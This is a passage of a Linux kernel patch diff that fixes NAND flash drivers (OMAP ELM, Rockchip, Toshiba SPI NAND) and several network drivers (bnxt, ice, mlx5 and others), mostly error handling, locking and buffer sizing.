+diff --git a/drivers/mtd/nand/raw/omap_elm.c b/drivers/mtd/nand/raw/omap_elm.c
+index 4796a48e1012a..22d37fc37e98a 100644
+--- a/drivers/mtd/nand/raw/omap_elm.c
++++ b/drivers/mtd/nand/raw/omap_elm.c
+@@ -177,17 +177,17 @@ static void elm_load_syndrome(struct elm_info *info,
+ 			switch (info->bch_type) {
+ 			case BCH8_ECC:
+ 				/* syndrome fragment 0 = ecc[9-12B] */
+-				val = cpu_to_be32(*(u32 *) &ecc[9]);
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[9]);
+ 				elm_write_reg(info, offset, val);
+ 
+ 				/* syndrome fragment 1 = ecc[5-8B] */
+ 				offset += 4;
+-				val = cpu_to_be32(*(u32 *) &ecc[5]);
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[5]);
+ 				elm_write_reg(info, offset, val);
+ 
+ 				/* syndrome fragment 2 = ecc[1-4B] */
+ 				offset += 4;
+-				val = cpu_to_be32(*(u32 *) &ecc[1]);
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[1]);
+ 				elm_write_reg(info, offset, val);
+ 
+ 				/* syndrome fragment 3 = ecc[0B] */
+@@ -197,35 +197,35 @@ static void elm_load_syndrome(struct elm_info *info,
+ 				break;
+ 			case BCH4_ECC:
+ 				/* syndrome fragment 0 = ecc[20-52b] bits */
+-				val = (cpu_to_be32(*(u32 *) &ecc[3]) >> 4) |
++				val = ((__force u32)cpu_to_be32(*(u32 *)&ecc[3]) >> 4) |
+ 					((ecc[2] & 0xf) << 28);
+ 				elm_write_reg(info, offset, val);
+ 
+ 				/* syndrome fragment 1 = ecc[0-20b] bits */
+ 				offset += 4;
+-				val = cpu_to_be32(*(u32 *) &ecc[0]) >> 12;
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[0]) >> 12;
+ 				elm_write_reg(info, offset, val);
+ 				break;
+ 			case BCH16_ECC:
+-				val = cpu_to_be32(*(u32 *) &ecc[22]);
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[22]);
+ 				elm_write_reg(info, offset, val);
+ 				offset += 4;
+-				val = cpu_to_be32(*(u32 *) &ecc[18]);
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[18]);
+ 				elm_write_reg(info, offset, val);
+ 				offset += 4;
+-				val = cpu_to_be32(*(u32 *) &ecc[14]);
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[14]);
+ 				elm_write_reg(info, offset, val);
+ 				offset += 4;
+-				val = cpu_to_be32(*(u32 *) &ecc[10]);
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[10]);
+ 				elm_write_reg(info, offset, val);
+ 				offset += 4;
+-				val = cpu_to_be32(*(u32 *) &ecc[6]);
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[6]);
+ 				elm_write_reg(info, offset, val);
+ 				offset += 4;
+-				val = cpu_to_be32(*(u32 *) &ecc[2]);
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[2]);
+ 				elm_write_reg(info, offset, val);
+ 				offset += 4;
+-				val = cpu_to_be32(*(u32 *) &ecc[0]) >> 16;
++				val = (__force u32)cpu_to_be32(*(u32 *)&ecc[0]) >> 16;
+ 				elm_write_reg(info, offset, val);
+ 				break;
+ 			default:
+diff --git a/drivers/mtd/nand/raw/rockchip-nand-controller.c b/drivers/mtd/nand/raw/rockchip-nand-controller.c
+index f133985cc053a..c9c4e9ffcae18 100644
+--- a/drivers/mtd/nand/raw/rockchip-nand-controller.c
++++ b/drivers/mtd/nand/raw/rockchip-nand-controller.c
+@@ -562,9 +562,10 @@ static int rk_nfc_write_page_raw(struct nand_chip *chip, const u8 *buf,
+ 		 *    BBM  OOB1 OOB2 OOB3 |......|  PA0  PA1  PA2  PA3
+ 		 *
+ 		 * The rk_nfc_ooblayout_free() function already has reserved
+-		 * these 4 bytes with:
++		 * these 4 bytes together with 2 bytes for BBM
++		 * by reducing it's length:
+ 		 *
+-		 * oob_region->offset = NFC_SYS_DATA_SIZE + 2;
++		 * oob_region->length = rknand->metadata_size - NFC_SYS_DATA_SIZE - 2;
+ 		 */
+ 		if (!i)
+ 			memcpy(rk_nfc_oob_ptr(chip, i),
+@@ -597,7 +598,7 @@ static int rk_nfc_write_page_hwecc(struct nand_chip *chip, const u8 *buf,
+ 	int pages_per_blk = mtd->erasesize / mtd->writesize;
+ 	int ret = 0, i, boot_rom_mode = 0;
+ 	dma_addr_t dma_data, dma_oob;
+-	u32 reg;
++	u32 tmp;
+ 	u8 *oob;
+ 
+ 	nand_prog_page_begin_op(chip, page, 0, NULL, 0);
+@@ -624,6 +625,13 @@ static int rk_nfc_write_page_hwecc(struct nand_chip *chip, const u8 *buf,
+ 	 *
+ 	 *   0xFF 0xFF 0xFF 0xFF | BBM OOB1 OOB2 OOB3 | ...
+ 	 *
++	 * The code here just swaps the first 4 bytes with the last
++	 * 4 bytes without losing any data.
++	 *
++	 * The chip->oob_poi data layout:
++	 *
++	 *    BBM  OOB1 OOB2 OOB3 |......|  PA0  PA1  PA2  PA3
++	 *
+ 	 * Configure the ECC algorithm supported by the boot ROM.
+ 	 */
+ 	if ((page < (pages_per_blk * rknand->boot_blks)) &&
+@@ -634,21 +642,17 @@ static int rk_nfc_write_page_hwecc(struct nand_chip *chip, const u8 *buf,
+ 	}
+ 
+ 	for (i = 0; i < ecc->steps; i++) {
+-		if (!i) {
+-			reg = 0xFFFFFFFF;
+-		} else {
++		if (!i)
++			oob = chip->oob_poi + (ecc->steps - 1) * NFC_SYS_DATA_SIZE;
++		else
+ 			oob = chip->oob_poi + (i - 1) * NFC_SYS_DATA_SIZE;
+-			reg = oob[0] | oob[1] << 8 | oob[2] << 16 |
+-			      oob[3] << 24;
+-		}
+ 
+-		if (!i && boot_rom_mode)
+-			reg = (page & (pages_per_blk - 1)) * 4;
++		tmp = oob[0] | oob[1] << 8 | oob[2] << 16 | oob[3] << 24;
+ 
+ 		if (nfc->cfg->type == NFC_V9)
+-			nfc->oob_buf[i] = reg;
++			nfc->oob_buf[i] = tmp;
+ 		else
+-			nfc->oob_buf[i * (oob_step / 4)] = reg;
++			nfc->oob_buf[i * (oob_step / 4)] = tmp;
+ 	}
+ 
+ 	dma_data = dma_map_single(nfc->dev, (void *)nfc->page_buf,
+@@ -811,12 +815,17 @@ static int rk_nfc_read_page_hwecc(struct nand_chip *chip, u8 *buf, int oob_on,
+ 		goto timeout_err;
+ 	}
+ 
+-	for (i = 1; i < ecc->steps; i++) {
+-		oob = chip->oob_poi + (i - 1) * NFC_SYS_DATA_SIZE;
++	for (i = 0; i < ecc->steps; i++) {
++		if (!i)
++			oob = chip->oob_poi + (ecc->steps - 1) * NFC_SYS_DATA_SIZE;
++		else
++			oob = chip->oob_poi + (i - 1) * NFC_SYS_DATA_SIZE;
++
+ 		if (nfc->cfg->type == NFC_V9)
+ 			tmp = nfc->oob_buf[i];
+ 		else
+ 			tmp = nfc->oob_buf[i * (oob_step / 4)];
++
+ 		*oob++ = (u8)tmp;
+ 		*oob++ = (u8)(tmp >> 8);
+ 		*oob++ = (u8)(tmp >> 16);
+@@ -933,12 +942,8 @@ static int rk_nfc_ooblayout_free(struct mtd_info *mtd, int section,
+ 	if (section)
+ 		return -ERANGE;
+ 
+-	/*
+-	 * The beginning of the OOB area stores the reserved data for the NFC,
+-	 * the size of the reserved data is NFC_SYS_DATA_SIZE bytes.
+-	 */
+ 	oob_region->length = rknand->metadata_size - NFC_SYS_DATA_SIZE - 2;
+-	oob_region->offset = NFC_SYS_DATA_SIZE + 2;
++	oob_region->offset = 2;
+ 
+ 	return 0;
+ }
+diff --git a/drivers/mtd/nand/spi/toshiba.c b/drivers/mtd/nand/spi/toshiba.c
+index 7380b1ebaccd5..a80427c131216 100644
+--- a/drivers/mtd/nand/spi/toshiba.c
++++ b/drivers/mtd/nand/spi/toshiba.c
+@@ -73,7 +73,7 @@ static int tx58cxgxsxraix_ecc_get_status(struct spinand_device *spinand,
+ {
+ 	struct nand_device *nand = spinand_to_nand(spinand);
+ 	u8 mbf = 0;
+-	struct spi_mem_op op = SPINAND_GET_FEATURE_OP(0x30, &mbf);
++	struct spi_mem_op op = SPINAND_GET_FEATURE_OP(0x30, spinand->scratchbuf);
+ 
+ 	switch (status & STATUS_ECC_MASK) {
+ 	case STATUS_ECC_NO_BITFLIPS:
+@@ -92,7 +92,7 @@ static int tx58cxgxsxraix_ecc_get_status(struct spinand_device *spinand,
+ 		if (spi_mem_exec_op(spinand->spimem, &op))
+ 			return nanddev_get_ecc_conf(nand)->strength;
+ 
+-		mbf >>= 4;
++		mbf = *(spinand->scratchbuf) >> 4;
+ 
+ 		if (WARN_ON(mbf > nanddev_get_ecc_conf(nand)->strength || !mbf))
+ 			return nanddev_get_ecc_conf(nand)->strength;
+diff --git a/drivers/net/dsa/bcm_sf2.c b/drivers/net/dsa/bcm_sf2.c
+index cde253d27bd08..72374b066f64a 100644
+--- a/drivers/net/dsa/bcm_sf2.c
++++ b/drivers/net/dsa/bcm_sf2.c
+@@ -1436,7 +1436,9 @@ static int bcm_sf2_sw_probe(struct platform_device *pdev)
+ 	if (IS_ERR(priv->clk))
+ 		return PTR_ERR(priv->clk);
+ 
+-	clk_prepare_enable(priv->clk);
++	ret = clk_prepare_enable(priv->clk);
++	if (ret)
++		return ret;
+ 
+ 	priv->clk_mdiv = devm_clk_get_optional(&pdev->dev, "sw_switch_mdiv");
+ 	if (IS_ERR(priv->clk_mdiv)) {
+@@ -1444,7 +1446,9 @@ static int bcm_sf2_sw_probe(struct platform_device *pdev)
+ 		goto out_clk;
+ 	}
+ 
+-	clk_prepare_enable(priv->clk_mdiv);
++	ret = clk_prepare_enable(priv->clk_mdiv);
++	if (ret)
++		goto out_clk;
+ 
+ 	ret = bcm_sf2_sw_rst(priv);
+ 	if (ret) {
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index 6469fb8a42a89..969db3c45d176 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -721,17 +721,24 @@ next_tx_int:
+ 
+ static struct page *__bnxt_alloc_rx_page(struct bnxt *bp, dma_addr_t *mapping,
+ 					 struct bnxt_rx_ring_info *rxr,
++					 unsigned int *offset,
+ 					 gfp_t gfp)
+ {
+ 	struct device *dev = &bp->pdev->dev;
+ 	struct page *page;
+ 
+-	page = page_pool_dev_alloc_pages(rxr->page_pool);
++	if (PAGE_SIZE > BNXT_RX_PAGE_SIZE) {
++		page = page_pool_dev_alloc_frag(rxr->page_pool, offset,
++						BNXT_RX_PAGE_SIZE);
++	} else {
++		page = page_pool_dev_alloc_pages(rxr->page_pool);
++		*offset = 0;
++	}
+ 	if (!page)
+ 		return NULL;
+ 
+-	*mapping = dma_map_page_attrs(dev, page, 0, PAGE_SIZE, bp->rx_dir,
+-				      DMA_ATTR_WEAK_ORDERING);
++	*mapping = dma_map_page_attrs(dev, page, *offset, BNXT_RX_PAGE_SIZE,
++				      bp->rx_dir, DMA_ATTR_WEAK_ORDERING);
+ 	if (dma_mapping_error(dev, *mapping)) {
+ 		page_pool_recycle_direct(rxr->page_pool, page);
+ 		return NULL;
+@@ -771,15 +778,16 @@ int bnxt_alloc_rx_data(struct bnxt *bp, struct bnxt_rx_ring_info *rxr,
+ 	dma_addr_t mapping;
+ 
+ 	if (BNXT_RX_PAGE_MODE(bp)) {
++		unsigned int offset;
+ 		struct page *page =
+-			__bnxt_alloc_rx_page(bp, &mapping, rxr, gfp);
++			__bnxt_alloc_rx_page(bp, &mapping, rxr, &offset, gfp);
+ 
+ 		if (!page)
+ 			return -ENOMEM;
+ 
+ 		mapping += bp->rx_dma_offset;
+ 		rx_buf->data = page;
+-		rx_buf->data_ptr = page_address(page) + bp->rx_offset;
++		rx_buf->data_ptr = page_address(page) + offset + bp->rx_offset;
+ 	} else {
+ 		u8 *data = __bnxt_alloc_rx_frag(bp, &mapping, gfp);
+ 
+@@ -839,7 +847,7 @@ static inline int bnxt_alloc_rx_page(struct bnxt *bp,
+ 	unsigned int offset = 0;
+ 
+ 	if (BNXT_RX_PAGE_MODE(bp)) {
+-		page = __bnxt_alloc_rx_page(bp, &mapping, rxr, gfp);
++		page = __bnxt_alloc_rx_page(bp, &mapping, rxr, &offset, gfp);
+ 
+ 		if (!page)
+ 			return -ENOMEM;
+@@ -986,15 +994,15 @@ static struct sk_buff *bnxt_rx_multi_page_skb(struct bnxt *bp,
+ 		return NULL;
+ 	}
+ 	dma_addr -= bp->rx_dma_offset;
+-	dma_unmap_page_attrs(&bp->pdev->dev, dma_addr, PAGE_SIZE, bp->rx_dir,
+-			     DMA_ATTR_WEAK_ORDERING);
+-	skb = build_skb(page_address(page), PAGE_SIZE);
++	dma_unmap_page_attrs(&bp->pdev->dev, dma_addr, BNXT_RX_PAGE_SIZE,
++			     bp->rx_dir, DMA_ATTR_WEAK_ORDERING);
++	skb = build_skb(data_ptr - bp->rx_offset, BNXT_RX_PAGE_SIZE);
+ 	if (!skb) {
+ 		page_pool_recycle_direct(rxr->page_pool, page);
+ 		return NULL;
+ 	}
+ 	skb_mark_for_recycle(skb);
+-	skb_reserve(skb, bp->rx_dma_offset);
++	skb_reserve(skb, bp->rx_offset);
+ 	__skb_put(skb, len);
+ 
+ 	return skb;
+@@ -1020,8 +1028,8 @@ static struct sk_buff *bnxt_rx_page_skb(struct bnxt *bp,
+ 		return NULL;
+ 	}
+ 	dma_addr -= bp->rx_dma_offset;
+-	dma_unmap_page_attrs(&bp->pdev->dev, dma_addr, PAGE_SIZE, bp->rx_dir,
+-			     DMA_ATTR_WEAK_ORDERING);
++	dma_unmap_page_attrs(&bp->pdev->dev, dma_addr, BNXT_RX_PAGE_SIZE,
++			     bp->rx_dir, DMA_ATTR_WEAK_ORDERING);
+ 
+ 	if (unlikely(!payload))
+ 		payload = eth_get_headlen(bp->dev, data_ptr, len);
+@@ -1034,7 +1042,7 @@ static struct sk_buff *bnxt_rx_page_skb(struct bnxt *bp,
+ 
+ 	skb_mark_for_recycle(skb);
+ 	off = (void *)data_ptr - page_address(page);
+-	skb_add_rx_frag(skb, 0, page, off, len, PAGE_SIZE);
++	skb_add_rx_frag(skb, 0, page, off, len, BNXT_RX_PAGE_SIZE);
+ 	memcpy(skb->data - NET_IP_ALIGN, data_ptr - NET_IP_ALIGN,
+ 	       payload + NET_IP_ALIGN);
+ 
+@@ -1169,7 +1177,7 @@ static struct sk_buff *bnxt_rx_agg_pages_skb(struct bnxt *bp,
+ 
+ 	skb->data_len += total_frag_len;
+ 	skb->len += total_frag_len;
+-	skb->truesize += PAGE_SIZE * agg_bufs;
++	skb->truesize += BNXT_RX_PAGE_SIZE * agg_bufs;
+ 	return skb;
+ }
+ 
+@@ -2972,8 +2980,8 @@ skip_rx_tpa_free:
+ 		rx_buf->data = NULL;
+ 		if (BNXT_RX_PAGE_MODE(bp)) {
+ 			mapping -= bp->rx_dma_offset;
+-			dma_unmap_page_attrs(&pdev->dev, mapping, PAGE_SIZE,
+-					     bp->rx_dir,
++			dma_unmap_page_attrs(&pdev->dev, mapping,
++					     BNXT_RX_PAGE_SIZE, bp->rx_dir,
+ 					     DMA_ATTR_WEAK_ORDERING);
+ 			page_pool_recycle_direct(rxr->page_pool, data);
+ 		} else {
+@@ -3241,6 +3249,8 @@ static int bnxt_alloc_rx_page_pool(struct bnxt *bp,
+ 	pp.nid = dev_to_node(&bp->pdev->dev);
+ 	pp.dev = &bp->pdev->dev;
+ 	pp.dma_dir = DMA_BIDIRECTIONAL;
++	if (PAGE_SIZE > BNXT_RX_PAGE_SIZE)
++		pp.flags |= PP_FLAG_PAGE_FRAG;
+ 
+ 	rxr->page_pool = page_pool_create(&pp);
+ 	if (IS_ERR(rxr->page_pool)) {
+@@ -4017,26 +4027,29 @@ void bnxt_set_ring_params(struct bnxt *bp)
+  */
+ int bnxt_set_rx_skb_mode(struct bnxt *bp, bool page_mode)
+ {
++	struct net_device *dev = bp->dev;
++
+ 	if (page_mode) {
+ 		bp->flags &= ~BNXT_FLAG_AGG_RINGS;
+ 		bp->flags |= BNXT_FLAG_RX_PAGE_MODE;
+ 
+-		if (bp->dev->mtu > BNXT_MAX_PAGE_MODE_MTU) {
++		if (bp->xdp_prog->aux->xdp_has_frags)
++			dev->max_mtu = min_t(u16, bp->max_mtu, BNXT_MAX_MTU);
++		else
++			dev->max_mtu =
++				min_t(u16, bp->max_mtu, BNXT_MAX_PAGE_MODE_MTU);
++		if (dev->mtu > BNXT_MAX_PAGE_MODE_MTU) {
+ 			bp->flags |= BNXT_FLAG_JUMBO;
+ 			bp->rx_skb_func = bnxt_rx_multi_page_skb;
+-			bp->dev->max_mtu =
+-				min_t(u16, bp->max_mtu, BNXT_MAX_MTU);
+ 		} else {
+ 			bp->flags |= BNXT_FLAG_NO_AGG_RINGS;
+ 			bp->rx_skb_func = bnxt_rx_page_skb;
+-			bp->dev->max_mtu =
+-				min_t(u16, bp->max_mtu, BNXT_MAX_PAGE_MODE_MTU);
+ 		}
+ 		bp->rx_dir = DMA_BIDIRECTIONAL;
+ 		/* Disable LRO or GRO_HW */
+-		netdev_update_features(bp->dev);
++		netdev_update_features(dev);
+ 	} else {
+-		bp->dev->max_mtu = bp->max_mtu;
++		dev->max_mtu = bp->max_mtu;
+ 		bp->flags &= ~BNXT_FLAG_RX_PAGE_MODE;
+ 		bp->rx_dir = DMA_FROM_DEVICE;
+ 		bp->rx_skb_func = bnxt_rx_skb;
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.c
+index 36d5202c0aeec..aa56db138d6b5 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_xdp.c
+@@ -180,8 +180,8 @@ void bnxt_xdp_buff_init(struct bnxt *bp, struct bnxt_rx_ring_info *rxr,
+ 			u16 cons, u8 *data_ptr, unsigned int len,
+ 			struct xdp_buff *xdp)
+ {
++	u32 buflen = BNXT_RX_PAGE_SIZE;
+ 	struct bnxt_sw_rx_bd *rx_buf;
+-	u32 buflen = PAGE_SIZE;
+ 	struct pci_dev *pdev;
+ 	dma_addr_t mapping;
+ 	u32 offset;
+@@ -297,7 +297,7 @@ bool bnxt_rx_xdp(struct bnxt *bp, struct bnxt_rx_ring_info *rxr, u16 cons,
+ 		rx_buf = &rxr->rx_buf_ring[cons];
+ 		mapping = rx_buf->mapping - bp->rx_dma_offset;
+ 		dma_unmap_page_attrs(&pdev->dev, mapping,
+-				     PAGE_SIZE, bp->rx_dir,
++				     BNXT_RX_PAGE_SIZE, bp->rx_dir,
+ 				     DMA_ATTR_WEAK_ORDERING);
+ 
+ 		/* if we are unable to allocate a new buffer, abort and reuse */
+@@ -478,7 +478,7 @@ bnxt_xdp_build_skb(struct bnxt *bp, struct sk_buff *skb, u8 num_frags,
+ 	}
+ 	xdp_update_skb_shared_info(skb, num_frags,
+ 				   sinfo->xdp_frags_size,
+-				   PAGE_SIZE * sinfo->nr_frags,
++				   BNXT_RX_PAGE_SIZE * sinfo->nr_frags,
+ 				   xdp_buff_is_frag_pfmemalloc(xdp));
+ 	return skb;
+ }
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 8f77088900e94..a771e597795d3 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -8777,6 +8777,7 @@ ice_setup_tc(struct net_device *netdev, enum tc_setup_type type,
+ {
+ 	struct ice_netdev_priv *np = netdev_priv(netdev);
+ 	struct ice_pf *pf = np->vsi->back;
++	bool locked = false;
+ 	int err;
+ 
+ 	switch (type) {
+@@ -8786,10 +8787,27 @@ ice_setup_tc(struct net_device *netdev, enum tc_setup_type type,
+ 						  ice_setup_tc_block_cb,
+ 						  np, np, true);
+ 	case TC_SETUP_QDISC_MQPRIO:
++		if (pf->adev) {
++			mutex_lock(&pf->adev_mutex);
++			device_lock(&pf->adev->dev);
++			locked = true;
++			if (pf->adev->dev.driver) {
++				netdev_err(netdev, "Cannot change qdisc when RDMA is active\n");
++				err = -EBUSY;
++				goto adev_unlock;
++			}
++		}
++
+ 		/* setup traffic classifier for receive side */
+ 		mutex_lock(&pf->tc_mutex);
+ 		err = ice_setup_tc_mqprio_qdisc(netdev, type_data);
+ 		mutex_unlock(&pf->tc_mutex);
++
++adev_unlock:
++		if (locked) {
++			device_unlock(&pf->adev->dev);
++			mutex_unlock(&pf->adev_mutex);
++		}
+ 		return err;
+ 	default:
+ 		return -EOPNOTSUPP;
+diff --git a/drivers/net/ethernet/korina.c b/drivers/net/ethernet/korina.c
+index 2b9335cb4bb3a..8537578e1cf1d 100644
+--- a/drivers/net/ethernet/korina.c
++++ b/drivers/net/ethernet/korina.c
+@@ -1302,11 +1302,10 @@ static int korina_probe(struct platform_device *pdev)
+ 	else if (of_get_ethdev_address(pdev->dev.of_node, dev) < 0)
+ 		eth_hw_addr_random(dev);
+ 
+-	clk = devm_clk_get_optional(&pdev->dev, "mdioclk");
++	clk = devm_clk_get_optional_enabled(&pdev->dev, "mdioclk");
+ 	if (IS_ERR(clk))
+ 		return PTR_ERR(clk);
+ 	if (clk) {
+-		clk_prepare_enable(clk);
+ 		lp->mii_clock_freq = clk_get_rate(clk);
+ 	} else {
+ 		lp->mii_clock_freq = 200000000; /* max possible input clk */
+diff --git a/drivers/net/ethernet/marvell/prestera/prestera_pci.c b/drivers/net/ethernet/marvell/prestera/prestera_pci.c
+index 59470d99f5228..a37dbbda8de39 100644
+--- a/drivers/net/ethernet/marvell/prestera/prestera_pci.c
++++ b/drivers/net/ethernet/marvell/prestera/prestera_pci.c
+@@ -702,7 +702,8 @@ pick_fw_ver:
+ 
+ 	err = request_firmware_direct(&fw->bin, fw_path, fw->dev.dev);
+ 	if (err) {
+-		if (ver_maj == PRESTERA_SUPP_FW_MAJ_VER) {
++		if (ver_maj != PRESTERA_PREV_FW_MAJ_VER ||
++		    ver_min != PRESTERA_PREV_FW_MIN_VER) {
+ 			ver_maj = PRESTERA_PREV_FW_MAJ_VER;
+ 			ver_min = PRESTERA_PREV_FW_MIN_VER;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec_rxtx.c b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec_rxtx.c
+index 6859f1c1a8319..c4a84f0a3b733 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec_rxtx.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/ipsec_rxtx.c
+@@ -58,7 +58,9 @@ static int mlx5e_ipsec_remove_trailer(struct sk_buff *skb, struct xfrm_state *x)
+ 
+ 	trailer_len = alen + plen + 2;
+ 
+-	pskb_trim(skb, skb->len - trailer_len);
++	ret = pskb_trim(skb, skb->len - trailer_len);
++	if (unlikely(ret))
++		return ret;
+ 	if (skb->protocol == htons(ETH_P_IP)) {
+ 		ipv4hdr->tot_len = htons(ntohs(ipv4hdr->tot_len) - trailer_len);
+ 		ip_send_check(ipv4hdr);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec_fs.c b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec_fs.c
+index 5b658a5588c64..6ecf0bf2366ad 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec_fs.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec_fs.c
+@@ -160,6 +160,7 @@ static int macsec_fs_tx_create_crypto_table_groups(struct mlx5e_flow_table *ft)
+ 
+ 	if (!in) {
+ 		kfree(ft->g);
++		ft->g = NULL;
+ 		return -ENOMEM;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c b/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c
+index 0ae1865086ff1..dc0a0a27ac84a 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_arfs.c
+@@ -136,6 +136,16 @@ static void arfs_del_rules(struct mlx5e_flow_steering *fs);
+ 
+ int mlx5e_arfs_disable(struct mlx5e_flow_steering *fs)
+ {
++	/* Moving to switchdev mode, fs->arfs is freed by mlx5e_nic_profile
++	 * cleanup_rx callback and it is not recreated when
++	 * mlx5e_uplink_rep_profile is loaded as mlx5e_create_flow_steering()
++	 * is not called by the uplink_rep profile init_rx callback. Thus, if
++	 * ntuple is set, moving to switchdev flow will enter this function
++	 * with fs->arfs nullified.
++	 */
++	if (!mlx5e_fs_get_arfs(fs))
++		return 0;
++
+ 	arfs_del_rules(fs);
+ 
+ 	return arfs_disable(fs);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+index 9bd1a93a512d4..bd895ef341a0b 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+@@ -912,7 +912,7 @@ static int mlx5e_init_rep_rx(struct mlx5e_priv *priv)
+ 	err = mlx5e_open_drop_rq(priv, &priv->drop_rq);
+ 	if (err) {
+ 		mlx5_core_err(mdev, "open drop rq failed, %d\n", err);
+-		return err;
++		goto err_rx_res_free;
+ 	}
+ 
+ 	err = mlx5e_rx_res_init(priv->rx_res, priv->mdev, 0,
+@@ -946,6 +946,7 @@ err_destroy_rx_res:
+ 	mlx5e_rx_res_destroy(priv->rx_res);
+ err_close_drop_rq:
+ 	mlx5e_close_drop_rq(&priv->drop_rq);
++err_rx_res_free:
+ 	mlx5e_rx_res_free(priv->rx_res);
+ 	priv->rx_res = NULL;
+ err_free_fs:
+@@ -1039,6 +1040,10 @@ static int mlx5e_init_rep_tx(struct mlx5e_priv *priv)
+ 		return err;
+ 	}
+ 
++	err = mlx5e_rep_neigh_init(rpriv);
++	if (err)
++		goto err_neigh_init;
++
+ 	if (rpriv->rep->vport == MLX5_VPORT_UPLINK) {
+ 		err = mlx5e_init_uplink_rep_tx(rpriv);
+ 		if (err)
+@@ -1055,6 +1060,8 @@ err_ht_init:
+ 	if (rpriv->rep->vport == MLX5_VPORT_UPLINK)
+ 		mlx5e_cleanup_uplink_rep_tx(rpriv);
+ err_init_tx:
++	mlx5e_rep_neigh_cleanup(rpriv);
++err_neigh_init:
+ 	mlx5e_destroy_tises(priv);
+ 	return err;
+ }
+@@ -1068,22 +1075,17 @@ static void mlx5e_cleanup_rep_tx(struct mlx5e_priv *priv)
+ 	if (rpriv->rep->vport == MLX5_VPORT_UPLINK)
+ 		mlx5e_cleanup_uplink_rep_tx(rpriv);
+ 
++	mlx5e_rep_neigh_cleanup(rpriv);
+ 	mlx5e_destroy_tises(priv);
+ }
+ 
+ static void mlx5e_rep_enable(struct mlx5e_priv *priv)
+ {
+-	struct mlx5e_rep_priv *rpriv = priv->ppriv;
+-
+ 	mlx5e_set_netdev_mtu_boundaries(priv);
+-	mlx5e_rep_neigh_init(rpriv);
+ }
+ 
+ static void mlx5e_rep_disable(struct mlx5e_priv *priv)
+ {
+-	struct mlx5e_rep_priv *rpriv = priv->ppriv;
+-
+-	mlx5e_rep_neigh_cleanup(rpriv);
+ }
+ 
+ static int mlx5e_update_rep_rx(struct mlx5e_priv *priv)
+@@ -1118,7 +1120,6 @@ static int uplink_rep_async_event(struct notifier_block *nb, unsigned long event
+ 
+ static void mlx5e_uplink_rep_enable(struct mlx5e_priv *priv)
+ {
+-	struct mlx5e_rep_priv *rpriv = priv->ppriv;
+ 	struct net_device *netdev = priv->netdev;
+ 	struct mlx5_core_dev *mdev = priv->mdev;
+ 	u16 max_mtu;
+@@ -1138,7 +1139,6 @@ static void mlx5e_uplink_rep_enable(struct mlx5e_priv *priv)
+ 	mlx5_notifier_register(mdev, &priv->events_nb);
+ 	mlx5e_dcbnl_initialize(priv);
+ 	mlx5e_dcbnl_init_app(priv);
+-	mlx5e_rep_neigh_init(rpriv);
+ 	mlx5e_rep_bridge_init(priv);
+ 
+ 	netdev->wanted_features |= NETIF_F_HW_TC;
+@@ -1153,7 +1153,6 @@ static void mlx5e_uplink_rep_enable(struct mlx5e_priv *priv)
+ 
+ static void mlx5e_uplink_rep_disable(struct mlx5e_priv *priv)
+ {
+-	struct mlx5e_rep_priv *rpriv = priv->ppriv;
+ 	struct mlx5_core_dev *mdev = priv->mdev;
+ 
+ 	rtnl_lock();
+@@ -1163,7 +1162,6 @@ static void mlx5e_uplink_rep_disable(struct mlx5e_priv *priv)
+ 	rtnl_unlock();
+ 
+ 	mlx5e_rep_bridge_cleanup(priv);
+-	mlx5e_rep_neigh_cleanup(rpriv);
+ 	mlx5e_dcbnl_delete_app(priv);
+ 	mlx5_notifier_unregister(mdev, &priv->events_nb);
+ 	mlx5e_rep_tc_disable(priv);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eq.c b/drivers/net/ethernet/mellanox/mlx5/core/eq.c
+index a0242dc15741c..e112b5685b02b 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eq.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eq.c
+@@ -1061,7 +1061,7 @@ void mlx5_core_eq_free_irqs(struct mlx5_core_dev *dev)
+ 	mutex_lock(&table->lock); /* sync with create/destroy_async_eq */
+ 	if (!mlx5_core_is_sf(dev))
+ 		clear_rmap(dev);
+-	mlx5_irq_table_destroy(dev);
